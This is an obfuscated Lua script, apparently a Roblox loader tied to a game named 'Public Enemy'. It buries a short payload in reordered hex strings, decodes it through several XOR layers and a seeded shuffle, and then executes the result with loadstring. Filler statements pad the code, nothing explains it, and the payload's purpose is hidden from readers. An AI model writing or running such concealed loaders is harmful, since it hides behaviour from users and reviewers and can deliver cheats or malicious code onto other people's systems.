local fSt3gdxhayFty=math.abs(-10)
local vHw4xGwnqr=bit32.bxor(105,49)
local l2P1lKvp1=math.floor(1)
local r3vKTYglPf_fahOL=type(nil)
local zk_PCVgxzv=math.abs(-74)
local jJedAF_VVAtqrZ31=type(nil)
local dq1waPo1VFmzj7=math.floor(5)
for _=1,0 do end
for _=1,0 do end
local efmlNh_8Ln=#"yEa6Cl"
local yqGN03RJRrl4=#"jWSwcpz2"
local qX4eZrsDqbkwUzQxQ=#"l0U8J"
local v322MPi6r33XsoGy=type(nil)
if false then error("") end
do local _=nil end
local gigdRdDpZ={"ec320a","891d38f3f3a5942457e7dbc345ec1dca4deb869a809e909c7ae6799753d18e70489141f45c64e2029987148ecad8700d38dfaa14"}
local rkWZpbApiWFB8Ga_la={2,1}
local kCI3mYKtQxleAF={"14808e1d80de7e9814de26c2dcf2439531a15ab9388110c9cd7fd2d2d40a518ca7e29176c3048b1797e4f79b7e3244a6070ffb01","8c0b0f"}
local mMwWy1imktMl_={1,2}
local qsQl4Y0ReHvWYSAC=#"kPJR2gF"
local y_JzMFBh6I_j9j=math.abs(-79)
local fRjGx15ibv5NSgOG=type(nil)
local zFEVMFt4Smre=tostring(79)
do local _=nil end
for _=1,0 do end
local dGM8atQhM_3wuR={}
for f2eenca78pZI6jn=1,#rkWZpbApiWFB8Ga_la do dGM8atQhM_3wuR[rkWZpbApiWFB8Ga_la[f2eenca78pZI6jn]]=gigdRdDpZ[f2eenca78pZI6jn] end
dGM8atQhM_3wuR=table.concat(dGM8atQhM_3wuR)
local scuzwipkj={}
for f2eenca78pZI6jn=1,#mMwWy1imktMl_ do scuzwipkj[mMwWy1imktMl_[f2eenca78pZI6jn]]=kCI3mYKtQxleAF[f2eenca78pZI6jn] end
scuzwipkj=table.concat(scuzwipkj)
local rZkT8hTJu={}
for f2eenca78pZI6jn=1,#dGM8atQhM_3wuR,2 do
  rZkT8hTJu[#rZkT8hTJu+1]=tonumber(string.sub(dGM8atQhM_3wuR,f2eenca78pZI6jn,f2eenca78pZI6jn+1),16)
end
local sESJyayf61EBmF={58,110,33,109,138,143,198,88,147,184,12,46,130,187,204,159,51,236,51,98,210,244,99,3,147,118,244,145,209,203,80,101,39,152,67,82,83,152,94,104,202,12,201,160,94,200,213,9}
for f2eenca78pZI6jn=1,#rZkT8hTJu do
  rZkT8hTJu[f2eenca78pZI6jn]=bit32.bxor(rZkT8hTJu[f2eenca78pZI6jn],sESJyayf61EBmF[(f2eenca78pZI6jn-1)%#sESJyayf61EBmF+1])
end
local eVUM8MPj900sJ={}
for f2eenca78pZI6jn=1,#scuzwipkj,2 do
  eVUM8MPj900sJ[#eVUM8MPj900sJ+1]=tonumber(string.sub(scuzwipkj,f2eenca78pZI6jn,f2eenca78pZI6jn+1),16)
end
local ea_7objmoF={3,127,156,223,50,166,98,70,160,219,236,106,233,55,101,135,163,119,69,124,102,148,79,223,251,126,187,181,126,137,94,19,83,51,45,33,83,61,222,3,144,88,147,201,147,173,221,86}
for f2eenca78pZI6jn=1,#eVUM8MPj900sJ do
  eVUM8MPj900sJ[f2eenca78pZI6jn]=bit32.bxor(eVUM8MPj900sJ[f2eenca78pZI6jn],ea_7objmoF[(f2eenca78pZI6jn-1)%#ea_7objmoF+1])
end
local dd_WsgmULewSfWq={}
for f2eenca78pZI6jn=1,math.max(#rZkT8hTJu,#eVUM8MPj900sJ) do
  if rZkT8hTJu[f2eenca78pZI6jn] then dd_WsgmULewSfWq[#dd_WsgmULewSfWq+1]=rZkT8hTJu[f2eenca78pZI6jn] end
  if eVUM8MPj900sJ[f2eenca78pZI6jn] then dd_WsgmULewSfWq[#dd_WsgmULewSfWq+1]=eVUM8MPj900sJ[f2eenca78pZI6jn] end
end
local lbBoU7hvEiOk={}
local z1LJSpZYPpgH=455913541
for f2eenca78pZI6jn=#dd_WsgmULewSfWq-1,1,-1 do
  z1LJSpZYPpgH=(z1LJSpZYPpgH*1664525+1013904223)%4294967296
  local gZoG5DAtek3P=z1LJSpZYPpgH%(f2eenca78pZI6jn+1)+1
  lbBoU7hvEiOk[#lbBoU7hvEiOk+1]={f2eenca78pZI6jn+1,gZoG5DAtek3P}
end
for f2eenca78pZI6jn=#lbBoU7hvEiOk,1,-1 do
  local iWvwQUOrDqQPBOePww=lbBoU7hvEiOk[f2eenca78pZI6jn]
  local s_XIqeImP2H3=dd_WsgmULewSfWq[iWvwQUOrDqQPBOePww[1]]
  dd_WsgmULewSfWq[iWvwQUOrDqQPBOePww[1]]=dd_WsgmULewSfWq[iWvwQUOrDqQPBOePww[2]]
  dd_WsgmULewSfWq[iWvwQUOrDqQPBOePww[2]]=s_XIqeImP2H3
end
local t6L16ZH3g2aI={}
local riWP3edRKCS4O5YuLU=968149246
for f2eenca78pZI6jn=#dd_WsgmULewSfWq-1,1,-1 do
  riWP3edRKCS4O5YuLU=(riWP3edRKCS4O5YuLU*1664525+1013904223)%4294967296
  local bIi2qqXYMbW=riWP3edRKCS4O5YuLU%(f2eenca78pZI6jn+1)+1
  t6L16ZH3g2aI[#t6L16ZH3g2aI+1]={f2eenca78pZI6jn+1,bIi2qqXYMbW}
end
for f2eenca78pZI6jn=#t6L16ZH3g2aI,1,-1 do
  local fL1OhrOFgOCInBmI=t6L16ZH3g2aI[f2eenca78pZI6jn]
  local ltfmQDpUN8ru5FQ=dd_WsgmULewSfWq[fL1OhrOFgOCInBmI[1]]
  dd_WsgmULewSfWq[fL1OhrOFgOCInBmI[1]]=dd_WsgmULewSfWq[fL1OhrOFgOCInBmI[2]]
  dd_WsgmULewSfWq[fL1OhrOFgOCInBmI[2]]=ltfmQDpUN8ru5FQ
end
local woRhin6SjdkPyewm={102,37,33,224,202,230,124,61,140,144,95,179,148,148,242,101,243,137,104,205,153,232,156,164,108,87,175,208,45,73,116,233,65,148,91,226,123,50,228,66,164,117,34,110,18,200,112,171}
for f2eenca78pZI6jn=1,#dd_WsgmULewSfWq do
  dd_WsgmULewSfWq[f2eenca78pZI6jn]=bit32.bxor(dd_WsgmULewSfWq[f2eenca78pZI6jn],woRhin6SjdkPyewm[(f2eenca78pZI6jn-1)%#woRhin6SjdkPyewm+1])
end
local jU77eOKNXiqM7Uv6Jp={61,171,3,206,109,205,9,216,4,226,97,16,206,187,220,230,211,228,218,81,28,166,64}
for f2eenca78pZI6jn=1,#dd_WsgmULewSfWq do
  dd_WsgmULewSfWq[f2eenca78pZI6jn]=bit32.bxor(dd_WsgmULewSfWq[f2eenca78pZI6jn],jU77eOKNXiqM7Uv6Jp[(f2eenca78pZI6jn-1)%#jU77eOKNXiqM7Uv6Jp+1])
end
local bMhQ0Gr8dwB=string.len("pvmux5d")
local twE8n2qNCKWCLKU5=bit32.bxor(154,168)
local iexcOZxPTu_GVQIbki=type(nil)
local xVwqMZ7tfn1q3RfX6D=#"kgcK"
if false then error("") end
local nG1QTorLhUfMhq={14,215,70,143,5,35,187,15,22,203,123,145,171,77,230,74,250,12,122,156,165,212,178,238,130,32,2,158,151,108,9,79,120,80,83,133,113,69,111,228,42,176,165,23,210,137,166,97}
local j9Vgx5CsMuvkQ={}
for f2eenca78pZI6jn=1,#dd_WsgmULewSfWq do
  j9Vgx5CsMuvkQ[f2eenca78pZI6jn]=string.char(bit32.bxor(dd_WsgmULewSfWq[f2eenca78pZI6jn],nG1QTorLhUfMhq[(f2eenca78pZI6jn-1)%#nG1QTorLhUfMhq+1]))
end
local adBCzRRL5Ob0e=table.concat(j9Vgx5CsMuvkQ)
local r8DO7uwoz3=string.len("tdq8QnH")
local aJZoYobp_XxPDQ=type(nil)
local fEeTi8I4Uh=math.floor(6)
local tHHTtfBiAT0VjE=tostring(79)
if false then error("") end
do local _=nil end
do local _=nil end
local ijZxYSmuEmV,jqUqgv5nRYc7BFD=loadstring(adBCzRRL5Ob0e)
if ijZxYSmuEmV then
  ijZxYSmuEmV()
else
  error("Mnx | Public Enemy : "..tostring(jqUqgv5nRYc7BFD))
end
